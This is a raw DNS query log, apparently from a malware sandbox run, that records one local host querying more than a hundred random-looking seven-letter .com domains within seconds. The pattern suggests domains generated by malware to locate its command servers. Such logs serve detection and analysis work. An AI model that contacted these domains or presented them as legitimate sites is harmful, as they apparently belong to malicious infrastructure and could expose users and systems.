                                                                                                                                                                                                                  Nov 11, 2024 18:51:14.664007902 CET192.168.2.61.1.1.10x55afStandard query (0)lyvymej.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:14.664086103 CET192.168.2.61.1.1.10x71a3Standard query (0)gahydyb.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:14.664158106 CET192.168.2.61.1.1.10xd48bStandard query (0)lyrylix.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:14.664308071 CET192.168.2.61.1.1.10x6389Standard query (0)lyrytod.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:14.664328098 CET192.168.2.61.1.1.10x44c8Standard query (0)pujyduv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:14.664504051 CET192.168.2.61.1.1.10xd797Standard query (0)purytov.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:14.664529085 CET192.168.2.61.1.1.10xfc6eStandard query (0)qegyvuq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:14.664688110 CET192.168.2.61.1.1.10xaacdStandard query (0)vowyrif.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:14.664702892 CET192.168.2.61.1.1.10xb3c2Standard query (0)qexyhap.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:14.706695080 CET192.168.2.61.1.1.10x4668Standard query (0)pufycyq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:14.707467079 CET192.168.2.61.1.1.10xe260Standard query (0)vonyqym.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:14.707623959 CET192.168.2.61.1.1.10x5935Standard query (0)lymywun.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:14.707811117 CET192.168.2.61.1.1.10x496cStandard query (0)lyxygax.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:14.707942963 CET192.168.2.61.1.1.10x3cb9Standard query (0)gaqyrib.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:14.708142996 CET192.168.2.61.1.1.10x4e36Standard query (0)qetylip.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:14.708173037 CET192.168.2.61.1.1.10xbe53Standard query (0)qeqyrug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:14.708362103 CET192.168.2.61.1.1.10x52fdStandard query (0)puzygop.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:14.708457947 CET192.168.2.61.1.1.10x1542Standard query (0)lykynon.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:14.709100008 CET192.168.2.61.1.1.10x1a77Standard query (0)qetytav.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:14.713746071 CET192.168.2.61.1.1.10xf89fStandard query (0)vonykuk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:14.715255976 CET192.168.2.61.1.1.10xf1d3Standard query (0)vopyzot.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:14.716506958 CET192.168.2.61.1.1.10x4cefStandard query (0)gahyvuh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:14.717144012 CET192.168.2.61.1.1.10x8a22Standard query (0)puvyjyl.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:14.717900038 CET192.168.2.61.1.1.10xad0aStandard query (0)volygoc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:14.721544981 CET192.168.2.61.1.1.10xda41Standard query (0)gatypas.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:14.721851110 CET192.168.2.61.1.1.10x251fStandard query (0)lykyfud.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:14.723701000 CET192.168.2.61.1.1.10xbfa3Standard query (0)vojybim.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:14.744082928 CET192.168.2.61.1.1.10x9218Standard query (0)qedyxel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:15.290885925 CET192.168.2.61.1.1.10x5768Standard query (0)qetykyq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:15.292977095 CET192.168.2.61.1.1.10x5d0aStandard query (0)puryjeq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:15.296391010 CET192.168.2.61.1.1.10x7c2dStandard query (0)lyvynid.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:15.340756893 CET192.168.2.61.1.1.10xb741Standard query (0)vopykum.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:15.341058016 CET192.168.2.61.1.1.10xe5e1Standard query (0)vojypat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:15.356749058 CET192.168.2.61.1.1.10x747Standard query (0)qegytop.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:15.419492960 CET192.168.2.61.1.1.10x707cStandard query (0)pupybul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:19.787843943 CET192.168.2.61.1.1.10xa41cStandard query (0)lykytin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:19.787997961 CET192.168.2.61.1.1.10x96d3Standard query (0)qekytig.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:19.788017035 CET192.168.2.61.1.1.10x99b4Standard query (0)gaqynih.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:19.788193941 CET192.168.2.61.1.1.10x44b8Standard query (0)lymynuj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:19.792309046 CET192.168.2.61.1.1.10x7f6aStandard query (0)lyryman.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:19.793225050 CET192.168.2.61.1.1.10x4a67Standard query (0)vojyzik.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:19.793586969 CET192.168.2.61.1.1.10x92eaStandard query (0)qebyvyl.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:19.827876091 CET192.168.2.61.1.1.10x954bStandard query (0)pujytug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:19.828193903 CET192.168.2.61.1.1.10xccd5Standard query (0)lysyjex.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:19.828193903 CET192.168.2.61.1.1.10x7f26Standard query (0)vowymom.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:19.828399897 CET192.168.2.61.1.1.10x4031Standard query (0)puzypav.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:19.828533888 CET192.168.2.61.1.1.10x39bfStandard query (0)qexysev.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:19.829437017 CET192.168.2.61.1.1.10xe2aeStandard query (0)vofykyt.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:19.829487085 CET192.168.2.61.1.1.10x6930Standard query (0)vojyrum.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:19.829674006 CET192.168.2.61.1.1.10x8d28Standard query (0)gatyhos.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:19.830034971 CET192.168.2.61.1.1.10x2288Standard query (0)pupyjap.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:19.880908012 CET192.168.2.61.1.1.10x193Standard query (0)lykyxoj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:19.948878050 CET192.168.2.61.1.1.10xec15Standard query (0)puvydyp.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:20.004805088 CET192.168.2.61.1.1.10x746eStandard query (0)lyvyver.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:20.011324883 CET192.168.2.61.1.1.10x62a1Standard query (0)volypof.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:20.015002012 CET192.168.2.61.1.1.10x3605Standard query (0)gadykyz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:20.026611090 CET192.168.2.61.1.1.10x22f3Standard query (0)purymog.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:20.027137995 CET192.168.2.61.1.1.10xbec2Standard query (0)vocydyc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:20.044784069 CET192.168.2.61.1.1.10x64caStandard query (0)gatyqeb.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:20.227752924 CET192.168.2.61.1.1.10xaebbStandard query (0)pufylul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:20.228034019 CET192.168.2.61.1.1.10x9429Standard query (0)qetyhov.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:20.228508949 CET192.168.2.61.1.1.10x6702Standard query (0)gahyziw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:20.228526115 CET192.168.2.61.1.1.10x1f4fStandard query (0)qetyqag.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:20.235501051 CET192.168.2.61.1.1.10xe030Standard query (0)lyvyfux.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:20.235717058 CET192.168.2.61.1.1.10x75f8Standard query (0)vopyqef.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:20.235899925 CET192.168.2.61.1.1.10x655bStandard query (0)vopyjac.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:20.236088037 CET192.168.2.61.1.1.10x1d19Standard query (0)qeqyniq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:20.236335993 CET192.168.2.61.1.1.10x8230Standard query (0)pujyxoq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:20.236480951 CET192.168.2.61.1.1.10x5e2cStandard query (0)qegylul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:20.236610889 CET192.168.2.61.1.1.10x9910Standard query (0)qebyfup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:20.426606894 CET192.168.2.61.1.1.10x30d7Standard query (0)vonybuk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:20.430234909 CET192.168.2.61.1.1.10x8117Standard query (0)ganyvyw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:20.440694094 CET192.168.2.61.1.1.10xafe5Standard query (0)pumybuq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:20.440887928 CET192.168.2.61.1.1.10xb5ccStandard query (0)ganyfuz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:20.441049099 CET192.168.2.61.1.1.10x640eStandard query (0)lygylur.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:20.441344976 CET192.168.2.61.1.1.10x26eeStandard query (0)galypob.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:20.441344976 CET192.168.2.61.1.1.10x9cc9Standard query (0)lyxysad.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:20.441615105 CET192.168.2.61.1.1.10x373dStandard query (0)pupywyv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:21.844223022 CET192.168.2.61.1.1.10xe801Standard query (0)lyryvex.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:21.844892979 CET192.168.2.61.1.1.10x97cdStandard query (0)lyryfyd.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:21.845772028 CET192.168.2.61.1.1.10xbf0eStandard query (0)puvytuq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:21.849484921 CET192.168.2.61.1.1.10x4ea4Standard query (0)lygymoj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:21.849612951 CET192.168.2.61.1.1.10x70e9Standard query (0)gacyzuz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:21.850372076 CET192.168.2.61.1.1.10x137Standard query (0)qexyryl.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:21.850474119 CET192.168.2.61.1.1.10x2a75Standard query (0)gaqycos.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:21.851483107 CET192.168.2.61.1.1.10x71afStandard query (0)vojyjof.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:21.851593018 CET192.168.2.61.1.1.10xb107Standard query (0)pumypog.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:21.852171898 CET192.168.2.61.1.1.10xdbf6Standard query (0)purycap.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:21.852581978 CET192.168.2.61.1.1.10xb6a1Standard query (0)vowycac.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:21.852802038 CET192.168.2.61.1.1.10x8a94Standard query (0)lygygin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:21.852967024 CET192.168.2.61.1.1.10x9ff0Standard query (0)vocyruk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:21.853272915 CET192.168.2.61.1.1.10x9298Standard query (0)vopybyt.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:21.853411913 CET192.168.2.61.1.1.10x1247Standard query (0)lymysan.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:21.853858948 CET192.168.2.61.1.1.10x8fd3Standard query (0)gahyhob.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:21.871095896 CET192.168.2.61.1.1.10xdca1Standard query (0)qeqysag.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:21.871251106 CET192.168.2.61.1.1.10xe64eStandard query (0)qexylup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:21.871639967 CET192.168.2.61.1.1.10x6177Standard query (0)vofygum.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:21.871962070 CET192.168.2.61.1.1.10x504aStandard query (0)gaqydeb.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:21.872088909 CET192.168.2.61.1.1.10x44deStandard query (0)lyxylux.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:21.872180939 CET192.168.2.61.1.1.10xdec7Standard query (0)pufymoq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:21.875371933 CET192.168.2.61.1.1.10xe564Standard query (0)qebytiq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:21.878606081 CET192.168.2.61.1.1.10xd5f1Standard query (0)puvyxil.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:21.883663893 CET192.168.2.61.1.1.10xabfcStandard query (0)pufygug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:21.886719942 CET192.168.2.61.1.1.10xb8b9Standard query (0)vowydef.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:21.886888981 CET192.168.2.61.1.1.10x6d03Standard query (0)gacyryw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:21.891603947 CET192.168.2.61.1.1.10x1eebStandard query (0)lysynur.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:21.893399954 CET192.168.2.61.1.1.10xf3aStandard query (0)volykyc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:21.893996000 CET192.168.2.61.1.1.10x5a47Standard query (0)vofymik.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:21.896539927 CET192.168.2.61.1.1.10x79c1Standard query (0)pupybul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:24.791176081 CET192.168.2.61.1.1.10xbf77Standard query (0)qetyvep.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:24.826234102 CET192.168.2.61.1.1.10xd3b2Standard query (0)lyvytuj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:24.827466011 CET192.168.2.61.1.1.10x6b28Standard query (0)gatyvyz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:24.855489969 CET192.168.2.61.1.1.10x95Standard query (0)pujyjav.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:24.946764946 CET192.168.2.61.1.1.10xe027Standard query (0)lykyjad.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:24.978303909 CET192.168.2.61.1.1.10xdc30Standard query (0)ganypih.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:25.046587944 CET192.168.2.61.1.1.10x964fStandard query (0)qekykev.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:25.106446981 CET192.168.2.61.1.1.10xe222Standard query (0)galykes.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:25.116779089 CET192.168.2.61.1.1.10x7dddStandard query (0)gadyfuh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:25.117336988 CET192.168.2.61.1.1.10x2ef8Standard query (0)qegyqaq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:32.940380096 CET192.168.2.61.1.1.10x6f3cStandard query (0)pumydyg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:32.940783024 CET192.168.2.61.1.1.10x2226Standard query (0)gacypiw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:32.975958109 CET192.168.2.61.1.1.10x3122Standard query (0)vofyjom.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:33.432344913 CET192.168.2.61.1.1.10xcb5aStandard query (0)lyvytuj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:33.434179068 CET192.168.2.61.1.1.10x75d0Standard query (0)vojyjof.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:33.475600958 CET192.168.2.61.1.1.10xf141Standard query (0)qetyvep.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:33.480500937 CET192.168.2.61.1.1.10x79e0Standard query (0)lysymor.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:33.481863022 CET192.168.2.61.1.1.10x7170Standard query (0)galyzus.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:33.484599113 CET192.168.2.61.1.1.10x2bb2Standard query (0)gahyhob.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:33.485570908 CET192.168.2.61.1.1.10x3538Standard query (0)lykylud.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:33.489969969 CET192.168.2.61.1.1.10x752bStandard query (0)puzyxip.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:33.534439087 CET192.168.2.61.1.1.10xca65Standard query (0)gaqyvys.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:33.538279057 CET192.168.2.61.1.1.10x1771Standard query (0)pujylyv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:33.538814068 CET192.168.2.61.1.1.10x5c0aStandard query (0)puvytuq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:33.539391994 CET192.168.2.61.1.1.10x4083Standard query (0)qeqyfug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:33.552567005 CET192.168.2.61.1.1.10x3f5dStandard query (0)lyrygid.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:33.648226976 CET192.168.2.61.1.1.10x9dd1Standard query (0)lykyjad.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:33.650856018 CET192.168.2.61.1.1.10x61cdStandard query (0)puvyxil.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:33.707451105 CET192.168.2.61.1.1.10x57d2Standard query (0)qekyluv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:33.710880995 CET192.168.2.61.1.1.10x9242Standard query (0)qeqyvev.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:33.774678946 CET192.168.2.61.1.1.10xed6aStandard query (0)volyzic.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:33.775126934 CET192.168.2.61.1.1.10x12adStandard query (0)puvypoq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:33.828207970 CET192.168.2.61.1.1.10xc76Standard query (0)lyxyxox.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:33.839971066 CET192.168.2.61.1.1.10x6699Standard query (0)qexyxop.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:33.877986908 CET192.168.2.61.1.1.10xfeb8Standard query (0)vojykyf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:33.901956081 CET192.168.2.61.1.1.10x7a70Standard query (0)lyrynux.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:33.943068027 CET192.168.2.61.1.1.10xea61Standard query (0)gatyniz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:34.038815022 CET192.168.2.61.1.1.10x1c6dStandard query (0)vocypok.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:34.040832043 CET192.168.2.61.1.1.10x6b0cStandard query (0)lykywex.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:34.155720949 CET192.168.2.61.1.1.10xd123Standard query (0)gadyqaw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:34.161046982 CET192.168.2.61.1.1.10x222aStandard query (0)lymyved.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:34.280922890 CET192.168.2.61.1.1.10xbe64Standard query (0)ganydeh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:34.281198978 CET192.168.2.61.1.1.10x557cStandard query (0)qexytil.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:34.282016039 CET192.168.2.61.1.1.10x6600Standard query (0)vowybyc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:34.343518019 CET192.168.2.61.1.1.10xcdb4Standard query (0)pupyguq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:34.344399929 CET192.168.2.61.1.1.10xae17Standard query (0)gadyhoh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:34.345057964 CET192.168.2.61.1.1.10x5b10Standard query (0)qedyqal.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:34.562999010 CET192.168.2.61.1.1.10x614eStandard query (0)vonydem.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:34.868071079 CET192.168.2.61.1.1.10x63fbStandard query (0)www.gahyqah.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:34.885309935 CET192.168.2.61.1.1.10xc43cStandard query (0)purydel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:34.887861967 CET192.168.2.61.1.1.10x11a0Standard query (0)lygymod.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:34.888211966 CET192.168.2.61.1.1.10x3e5dStandard query (0)gacyzuh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:34.888828039 CET192.168.2.61.1.1.10xc04dStandard query (0)vowydet.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:34.891716957 CET192.168.2.61.1.1.10x844cStandard query (0)qexyluq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:34.893820047 CET192.168.2.61.1.1.10xbb8dStandard query (0)gaqydaz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:34.894042969 CET192.168.2.61.1.1.10x3a62Standard query (0)lyxylyj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:34.894665003 CET192.168.2.61.1.1.10x71b7Standard query (0)pujywep.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:34.894685984 CET192.168.2.61.1.1.10xcb1Standard query (0)pufymiv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:34.895222902 CET192.168.2.61.1.1.10x409cStandard query (0)qetyfyl.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:34.895507097 CET192.168.2.61.1.1.10x48f6Standard query (0)vojyqac.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:34.896193981 CET192.168.2.61.1.1.10xad62Standard query (0)vocyzum.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:34.896756887 CET192.168.2.61.1.1.10xd6c6Standard query (0)gatyfuw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:34.896922112 CET192.168.2.61.1.1.10xc665Standard query (0)qebyxog.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:34.897583961 CET192.168.2.61.1.1.10xed49Standard query (0)qegyqov.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:34.897785902 CET192.168.2.61.1.1.10xc357Standard query (0)lyryfyr.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:34.898298979 CET192.168.2.61.1.1.10xc57fStandard query (0)gahyqas.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:34.898662090 CET192.168.2.61.1.1.10x91e4Standard query (0)lyryvaj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:34.898827076 CET192.168.2.61.1.1.10xc65eStandard query (0)puvyxig.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:34.899715900 CET192.168.2.61.1.1.10xee16Standard query (0)lyvyxin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:34.903327942 CET192.168.2.61.1.1.10xf278Standard query (0)lysyfed.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:34.903650045 CET192.168.2.61.1.1.10xd3f6Standard query (0)pumyxul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:34.911853075 CET192.168.2.61.1.1.10x5680Standard query (0)galyqoh.comA (IP address)IN (0x0001)false
